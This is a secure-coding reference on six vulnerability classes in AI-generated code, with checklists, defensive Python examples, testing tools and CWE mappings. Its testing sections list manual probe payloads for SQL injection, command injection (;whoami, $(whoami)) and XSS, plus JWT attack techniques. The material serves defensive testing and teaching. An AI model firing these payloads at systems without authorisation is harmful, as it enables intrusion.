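1	Hardcoded Secrets	Critical	Very High	Credential theft, API abuse, data breach
2	SQL/Command Injection	Critical	High	Database compromise, remote code execution, system takeover
3	Cross-Site Scripting (XSS)	High	Very High	Session hijacking, account takeover, defacement
4	Authentication/Session	Critical	High	Complete authentication bypass, privilege escalation
5	Cryptographic Failures	High	Very High	Data decryption, credential exposure, forgery
6	Input Validation	High	Very High	Enables all other injection attacks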

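Why These Six Patterns Matter

They are interconnected: input validation failures enable injection attacks; cryptographic failures expose the secrets that credential management is supposed to protect; authentication weaknesses make XSS more damaging.

AI models struggle with all of them: training data contains countless examples of insecure patterns, and models optimize for code that runs rather than code that is secure. The patterns that make code secure are often invisible in the code itself (environment variables, parameterized queries, correct encoding), while the insecure patterns are explicit and visible.

They compound: a single hardcoded secret can expose thousands of users; a single SQL injection can compromise an entire database; a single XSS flaw can persist across sessions and users.

Key Checklists: One-Line Reminders

These concise checklists provide a quick reference for each pattern. Use them during code review or before committing changes.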

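Pattern 1: Hardcoded Secrets

✓	Checkpoint
□	No API keys, passwords, or tokens in source files
□	All secrets are loaded from environment variables or a secret manager
□	`.env` files are listed in `.gitignore`, with an `.env.example` template committed instead
□	No secrets appear in logs, error messages, or URLs
□	Secret scanning is enabled in the CI/CD pipeline
□	Credentials are rotated regularly, and rotation is automated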
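As a small illustration of the second checkpoint, a secret can be read from the environment with a fail-fast check, so a missing value stops startup instead of silently falling back to a default. `require_secret` and `MissingSecretError` are hypothetical names introduced for this sketch; the optional `environ` argument exists only to make the function easy to test.

```python
import os


class MissingSecretError(RuntimeError):
    """Raised when a required secret is absent from the environment."""


def require_secret(name, environ=None):
    """Return the secret stored under `name`, or fail loudly if it is not set."""
    env = os.environ if environ is None else environ
    value = env.get(name, "")
    if not value.strip():
        # The message names the variable but never includes a secret value.
        raise MissingSecretError(f"required secret {name} is not set")
    return value
```

A typical call would be `api_key = require_secret("PAYMENT_API_KEY")` during application startup, where `PAYMENT_API_KEY` is a placeholder variable name.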

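Pattern 2: SQL/Command Injection

✓	Checkpoint
□	All SQL queries use parameterized statements (no string concatenation)
□	Dynamic identifiers (table/column names) are validated against an allowlist
□	ORM queries are reviewed for raw-query vulnerabilities
□	Shell commands avoid user input; where it is unavoidable, it is validated against an allowlist
□	Second-order injection is checked (stored data used in queries)
□	Prepared statements are used for all query types (SELECT, INSERT, ORDER BY)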
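The first two checkpoints can be illustrated with Python's built-in `sqlite3` module. Values are bound with `?` placeholders, while the sort column, which cannot be bound as a parameter, is checked against an allowlist before being placed in the statement. The `users` table, its columns, and the `find_users` helper are assumptions made for this sketch.

```python
import sqlite3

# Columns a caller may sort by; anything else is rejected outright.
SORTABLE_COLUMNS = {"name", "created_at"}


def find_users(conn, name, sort_by="name"):
    """Look up users by exact name, ordered by an allowlisted column."""
    if sort_by not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    # The identifier comes from the allowlist; the value is bound as a parameter.
    sql = f"SELECT id, name FROM users WHERE name = ? ORDER BY {sort_by}"
    return conn.execute(sql, (name,)).fetchall()
```

With this shape, a payload such as `' OR '1'='1` is treated as a literal name and simply matches no rows, and an attempt to smuggle SQL through `sort_by` is rejected before any query is built.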

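Pattern 3: Cross-Site Scripting (XSS)

✓	Checkpoint
□	HTML encoding for HTML body context
□	Attribute encoding for HTML attributes (especially event handlers)
□	JavaScript encoding for inline scripts
□	URL encoding for URL contexts
□	CSP headers are configured with a strict policy (no `unsafe-inline`)
□	`innerHTML` is avoided; use `textContent` or framework-safe bindings
□	Sanitization libraries are tested against mutation XSS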
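A minimal sketch of context-aware encoding for three of these contexts (HTML body, HTML attribute, URL) using only the Python standard library is shown below. The function names are hypothetical, and real applications would normally rely on a templating engine with auto-escaping rather than string formatting. The link helper assumes that only absolute `http` and `https` URLs are acceptable, so relative URLs are rejected as well.

```python
import html
from urllib.parse import quote, urlsplit


def render_comment(author, text):
    """Escape untrusted values for an attribute and for the element body."""
    return f'<p title="{html.escape(author, quote=True)}">{html.escape(text)}</p>'


def safe_link(url, label):
    """Allow only http(s) links, then escape the URL for the attribute context."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in {"http", "https"}:
        raise ValueError("unsupported URL scheme")
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


def search_url(term):
    """Percent-encode an untrusted value before placing it in a query string."""
    return "/search?q=" + quote(term, safe="")
```

The scheme check is what stops `javascript:alert(1)`; HTML escaping alone would leave that payload intact inside the `href` attribute.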

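Pattern 4: Authentication/Session Security

✓	Checkpoint
□	Passwords are hashed with bcrypt/Argon2 (not MD5/SHA1)
□	Session tokens are generated with a cryptographically secure random source (256+ bits of entropy)
□	The JWT algorithm is explicitly validated (`alg: none` is rejected)
□	Tokens are stored in HttpOnly, Secure, SameSite cookies
□	Sessions are invalidated on logout (server side)
□	Constant-time comparison is used for password/token verification
□	Authentication endpoints are rate-limited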
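Three of these checkpoints (token generation, cookie attributes, constant-time comparison) can be sketched with the Python standard library. The helper names and the cookie name `session` are illustrative assumptions; a real application would usually let its web framework set the cookie.

```python
import hmac
import secrets
from http.cookies import SimpleCookie


def new_session_token():
    """Generate a URL-safe token from 32 random bytes (256 bits) via the OS CSPRNG."""
    return secrets.token_urlsafe(32)


def session_cookie_header(token):
    """Build a Set-Cookie value with HttpOnly, Secure, and SameSite attributes."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def tokens_match(presented, expected):
    """Compare tokens in constant time to avoid leaking a matching prefix via timing."""
    return hmac.compare_digest(presented.encode(), expected.encode())
```

`SameSite=Strict` is an assumption here; `Lax` may be the more practical choice where users arrive through links from other sites.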

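Pattern 5: Cryptographic Failures

✓	Checkpoint
□	Symmetric encryption uses AES-256-GCM or ChaCha20-Poly1305
□	A fresh random IV/nonce is used for every encryption operation
□	A CSPRNG is used for all security-sensitive random values
□	bcrypt/Argon2id is used for password hashing (not PBKDF2)
□	Key derivation uses HKDF or PBKDF2 with an appropriate iteration count
□	No ECB mode, no static IVs, no Math.random()
□	Constant-time comparison is used for MAC/signature verification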
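The key-derivation, CSPRNG, and constant-time checkpoints can be illustrated with the standard library alone. In this sketch, `derive_key`, `sign`, and `verify` are hypothetical helpers, and the default of 600,000 PBKDF2-HMAC-SHA256 iterations is an assumed starting point that should be tuned to the target hardware. Authenticated encryption itself (AES-GCM or ChaCha20-Poly1305) needs a third-party library and is not shown.

```python
import hashlib
import hmac
import os


def derive_key(passphrase, salt=None, iterations=600_000):
    """Derive a 32-byte key with PBKDF2-HMAC-SHA256 and a random per-key salt."""
    salt = os.urandom(16) if salt is None else salt  # os.urandom is a CSPRNG
    key = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, iterations, dklen=32)
    return key, salt


def sign(key, message):
    """Compute an HMAC-SHA256 tag over the message bytes."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(key, message, tag):
    """Check a tag in constant time rather than with ==."""
    return hmac.compare_digest(sign(key, message), tag)
```

The salt must be stored alongside whatever the key protects, since the same passphrase with a different salt yields a different key.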

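Pattern 6: Input Validation

✓	Checkpoint
□	All validation is performed on the server side
□	Schema validation uses `additionalProperties: false`
□	All regex patterns are anchored with `^` and `$`
□	Length limits are checked before regex matching
□	Null bytes are rejected in string inputs
□	Unicode is normalized before validation
□	Type coercion is explicit, with error handling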
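The last checkpoint, explicit type coercion with error handling, might look like the following for a numeric field. `parse_quantity` and its 1 to 1000 range are assumptions chosen for the example. The function accepts an integer or a short string of ASCII digits and rejects everything else, including booleans, which Python would otherwise treat as integers.

```python
import re

DIGITS_RE = re.compile(r"[0-9]+")  # ASCII digits only; \d would also accept other scripts


def parse_quantity(raw, minimum=1, maximum=1000):
    """Coerce a request value to an int within [minimum, maximum] or raise ValueError."""
    if isinstance(raw, bool) or not isinstance(raw, (int, str)):
        raise ValueError("quantity must be an integer or a digit string")
    if isinstance(raw, str):
        # Bound the length first, then require the whole string to be digits.
        if len(raw) > 10 or not DIGITS_RE.fullmatch(raw):
            raise ValueError("quantity is not a plain decimal number")
        raw = int(raw)
    if not minimum <= raw <= maximum:
        raise ValueError("quantity out of range")
    return raw
```

Rejecting inputs like `"1e3"`, `["1"]`, or `True` up front avoids the silent coercions that type-confusion payloads rely on.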

Testing Recommendations by Vulnerability Type

Hardcoded Secrets Testing

// Automated Secret Detection
1. Pre-commit hooks with secret scanners:
   - TruffleHog
   - detect-secrets
   - gitleaks
   - git-secrets

2. CI/CD Pipeline Scanning:
   - Run on every PR/MR
   - Scan full git history on merge to main
   - Block deployment on secret detection

3. Runtime Detection:
   - Log analysis for credential patterns
   - API request auditing for hardcoded keys
   - Cloud provider secret exposure alerts

// Testing Checklist
- [ ] Scan all source files for API key patterns
- [ ] Scan all config files for password strings
- [ ] Check git history for past secret commits
- [ ] Verify environment variables are properly loaded
- [ ] Test application behavior when secrets are missing
- [ ] Verify secrets are not exposed in error messages

SQL/Command Injection Testing

// Automated Testing Tools
1. SAST (Static Analysis):
   - Semgrep with injection rules
   - CodeQL injection queries
   - SonarQube SQL injection checks

2. DAST (Dynamic Analysis):
   - SQLMap for SQL injection
   - Burp Suite active scanning
   - OWASP ZAP automated scan

3. Manual Testing Payloads:
   // SQL Injection
   - Single quote: '
   - Comment: -- or #
   - Boolean: ' OR '1'='1
   - Time-based: '; WAITFOR DELAY '0:0:10'--
   - Union: ' UNION SELECT null,null--

   // Command Injection
   - Semicolon: ;whoami
   - Pipe: |id
   - Backticks: `whoami`
   - Command substitution: $(whoami)
   - Newline: %0a id

// Testing Checklist
- [ ] Test all user input fields with injection payloads
- [ ] Test ORDER BY, LIMIT, table name parameters
- [ ] Test stored data for second-order injection
- [ ] Test file paths for command injection
- [ ] Verify all queries use parameterization
- [ ] Check logs don't reveal injection success/failure

XSS Testing

// Automated Testing
1. Browser Tools:
   - DOM Invader (Burp)
   - XSS Hunter
   - DOMPurify testing mode

2. Automated Scanners:
   - Burp Suite XSS scanner
   - OWASP ZAP active scan
   - Nuclei XSS templates

3. Manual Testing Payloads:
   // HTML Context
   - <script>alert(1)</script>
   - <img src=x onerror=alert(1)>
   - <svg onload=alert(1)>

   // Attribute Context
   - " onmouseover="alert(1)
   - ' onfocus='alert(1)' autofocus='

   // JavaScript Context
   - '-alert(1)-'
   - ';alert(1)//
   - \u003cscript\u003e

   // URL Context
   - javascript:alert(1)
   - data:text/html,<script>alert(1)</script>

// Testing Checklist
- [ ] Test all output points with context-specific payloads
- [ ] Test encoding bypass techniques
- [ ] Test DOM XSS with source/sink analysis
- [ ] Verify CSP headers block inline scripts
- [ ] Test mutation XSS with sanitizer bypass payloads
- [ ] Check for polyglot XSS across contexts

Authentication/Session Testing

// Testing Tools
1. Session Analysis:
   - Burp Suite session handling
   - OWASP ZAP session management
   - Custom scripts for token analysis

2. JWT Testing:
   - jwt.io debugger
   - jwt_tool
   - jose library testing

3. Manual Testing:
   // Session Token Analysis
   - Check entropy (should be 256+ bits)
   - Test token predictability
   - Test session fixation

   // JWT Attacks
   - Algorithm confusion (RS256 → HS256)
   - None algorithm bypass
   - Key injection attacks
   - Signature stripping

   // Authentication Bypass
   - SQL injection in login
   - Password reset token prediction
   - OAuth state parameter manipulation

// Testing Checklist
- [ ] Test session token randomness
- [ ] Verify session invalidation on logout
- [ ] Test for session fixation
- [ ] Verify JWT algorithm validation
- [ ] Test rate limiting on login
- [ ] Check for timing attacks on password comparison
- [ ] Test password reset flow for token issues

Cryptographic Implementation Testing

// Crypto Testing Tools
1. Static Analysis:
   - Semgrep crypto rules
   - CryptoGuard
   - Crypto-detector

2. Manual Review:
   // Check for weak algorithms:
   grep -r "MD5\|SHA1\|DES\|RC4\|ECB" .

   // Check for static IVs (-E so that + works as a quantifier):
   grep -rE "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" .

   // Check for weak randomness (-E so that \(\) matches literal parentheses):
   grep -rE "Math\.random|random\.random|rand\(\)" .

3. Runtime Testing:
   - Encrypt same plaintext twice, verify different ciphertext
   - Test key derivation iterations (should take 100ms+)
   - Verify timing consistency in comparisons

// Testing Checklist
- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage
- [ ] Confirm unique IV/nonce per encryption
- [ ] Test password hashing takes appropriate time (100ms+)
- [ ] Verify CSPRNG used for all secrets
- [ ] Check key derivation iteration counts
- [ ] Test for padding oracle vulnerabilities
- [ ] Verify constant-time comparison functions

Input Validation Testing

// Testing Approach
1. Boundary Testing:
   - Empty strings, null, undefined
   - Max length + 1
   - Integer boundaries (MAX_INT, MIN_INT)
   - Unicode normalization variants

2. Type Confusion:
   - Array where string expected: ["value"]
   - Object where string expected: {"$gt": ""}
   - Number where string expected: 12345
   - Boolean where object expected: true

3. Encoding Bypass:
   - URL encoding: %00, %2e%2e%2f
   - Unicode: \u0000, \ufeff
   - Double encoding: %252e
   - Overlong UTF-8

4. ReDoS Testing:
   - For each regex, test with: (valid_char * 30) + invalid_char
   - Measure response time (should be < 100ms)
   - Use regex-dos-detector tools

// Testing Checklist
- [ ] Test all endpoints with null/empty values
- [ ] Test numeric fields with boundary values
- [ ] Test string fields with max length exceeded
- [ ] Test type confusion for all input fields
- [ ] Test regex patterns for ReDoS
- [ ] Verify server-side validation matches client-side
- [ ] Test Unicode normalization issues

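Additional Pattern References

This depth document covers the 6 most critical security patterns in detail. For coverage of other security anti-patterns, see [[ANTI_PATTERNS_BREADTH]], which includes:

Pattern Category	Patterns Covered
File System Security	Path traversal, insecure file uploads, insecure temporary files
Access Control	Missing authorization checks, IDOR, privilege escalation
Network Security	SSRF, insecure deserialization, unvalidated redirects
Error Handling	Information disclosure, stack traces, verbose errors
Logging Security	Sensitive data in logs, insufficient logging
Concurrency	Race conditions, TOCTOU, deadlocks
Dependency Security	Outdated dependencies, typosquatting, lockfile tampering
Configuration	Debug mode in production, default credentials
API Security	Mass assignment, excessive data exposure, rate limiting

Use the breadth document for quick reference across many patterns. Use the depth document for a thorough understanding of the most critical ones.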

External Resources

OWASP Resources

OWASP Top 10 (2021): https://owasp.org/Top10/
OWASP Cheat Sheet Series: https://cheatsheetseries.owasp.org/
OWASP Testing Guide: https://owasp.org/www-project-web-security-testing-guide/
OWASP ASVS: https://owasp.org/www-project-application-security-verification-standard/

CWE References

CWE Top 25 (2024): https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html
CWE/SANS Top 25: https://www.sans.org/top25-software-errors/

CWE Mapping for This Document

Pattern	Primary CWEs
Hardcoded Secrets	CWE-798, CWE-259, CWE-321, CWE-200
SQL Injection	CWE-89, CWE-564
Command Injection	CWE-78, CWE-77
XSS	CWE-79, CWE-80, CWE-83, CWE-87
Authentication	CWE-287, CWE-384, CWE-613, CWE-307
Session Security	CWE-384, CWE-613, CWE-614, CWE-1004
Cryptographic Failures	CWE-327, CWE-328, CWE-329, CWE-338, CWE-916
Input Validation	CWE-20, CWE-1333, CWE-185, CWE-176

AI Code Security Research

GitHub Copilot security analysis: https://arxiv.org/abs/2108.09293
Stanford / "Asleep at the Keyboard" study: https://arxiv.org/abs/2211.03622
USENIX package hallucination study (2024): https://www.usenix.org/conference/usenixsecurity24
Veracode State of Software Security report (2024-2025): https://www.veracode.com/state-of-software-security-report
Snyk developer security survey (2024): https://snyk.io/reports/

Security Testing Tools

Tool	Purpose	URL
Semgrep	Static analysis with security rules	https://semgrep.dev
CodeQL	GitHub security queries	https://codeql.github.com
TruffleHog	Secret scanning	https://github.com/trufflesecurity/trufflehog
SQLMap	SQL injection testing	https://sqlmap.org
Burp Suite	Web security testing	https://portswigger.net/burp
OWASP ZAP	Open-source web security scanner	https://www.zaproxy.org
jwt_tool	JWT security testing	https://github.com/ticarpi/jwt_tool
Gitleaks	Git secret scanning	https://github.com/gitleaks/gitleaks

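Document Information

Document: AI Code Security Anti-Patterns: Depth Version
Version: 1.0.0
Last updated: 2026-01-18
Patterns covered: 6 (hardcoded secrets, SQL/command injection, XSS, authentication/session, cryptography, input validation)

Changelog

Date	Version	Changes
2026-01-18	1.0.0	Initial release with 6 comprehensive pattern deep dives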

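Contributing

This document is part of the AI Code Security Anti-Patterns project. Security patterns evolve as new research emerges and AI models are updated. Contributions are welcome in the following areas:

New edge cases and exploitation techniques
Updated statistics and research citations
Additional testing methods
Framework-specific secure coding examples

This document is designed to be included in an AI assistant's context window to improve the security of generated code. For best results, include it together with [[ANTI_PATTERNS_BREADTH]] when reviewing or generating security-sensitive code.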


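Pattern	OWASP Cheat Sheet
Secrets Management	Secrets Management Cheat Sheet
SQL Injection	Query Parameterization Cheat Sheet
XSS	XSS Prevention Cheat Sheet
Authentication	Authentication Cheat Sheet
Session Management	Session Management Cheat Sheet
Cryptography	Cryptographic Storage Cheat Sheet
Input Validation	Input Validation Cheat Sheet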
